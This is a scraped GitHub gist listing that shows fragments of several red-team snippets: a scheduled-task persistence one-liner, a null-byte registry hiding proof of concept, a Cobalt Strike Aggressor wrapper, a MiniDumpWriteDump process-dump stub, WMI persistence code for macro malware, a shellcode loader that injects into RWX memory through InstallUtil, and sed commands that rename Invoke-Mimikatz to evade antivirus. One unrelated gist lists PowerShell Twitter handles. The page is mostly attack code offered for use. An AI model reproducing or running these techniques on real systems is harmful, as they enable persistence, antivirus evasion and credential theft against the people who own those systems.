Skip to content

Instantly share code, notes, and snippets.

View netbiosX's full-sized avatar

netbiosX netbiosX

View GitHub Profile
View mimistack
143 function Invoke-Mimidogz
140 function Invoke-Mimikatz
29 function Invoke-Mimi
10 function Chokorun
7 function Invoke-Ttest
7 function Invoke-Mimiwormz
7 function Invoke-Me
6 function Invoke-Mimiturtle
6 function Invoke-Mimimi
5 function output
mubix / schtaskmod.ps1
Last active July 18, 2019 13:29
Modify Scheduled Task
View schtaskmod.ps1
Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions }
Graph-X /
Last active October 1, 2019 16:46
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
from Microsoft.Win32 import Registry
from time import sleep
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!')
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')
brettmillerb /
Last active January 8, 2020 10:45
Generate a list of displaynames/handles from Powershell Twitter List
DisplayName                          Twitterhandle   
-----------                          -------------   
fr016                                @fr0161         
chgopsug                             @chgopsug       
Kevin Bates                          @_bateskevin    
Danny Maertens                       @maertend33     
Julien Reisdorffer                   @JReisdorffer   
Ben Reader                           @powers_hell    
dtmsecurity / sharpgen.cna
Created November 8, 2018 16:34
SharpGen Aggressor Beacon Wrapper
View sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";
View Invoke-Procdump.ps1
$Source = @"
using System;
using System.Runtime.InteropServices;
namespace ProcDump {
public static class DbgHelp {
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, IntPtr DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
mgeeky / WMIPersistence.vbs
Last active June 1, 2022 12:58
Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up.
View WMIPersistence.vbs
' WMI Persistence method as originally presented by SEADADDY malware
' (
' and further documented by Matt Graeber.
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
nicholasmckinney / rwxHunter.cs
Created May 8, 2017 00:33
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
View rwxHunter.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
PaulSec /
Created August 1, 2017 13:50
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From:
# Server side:
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1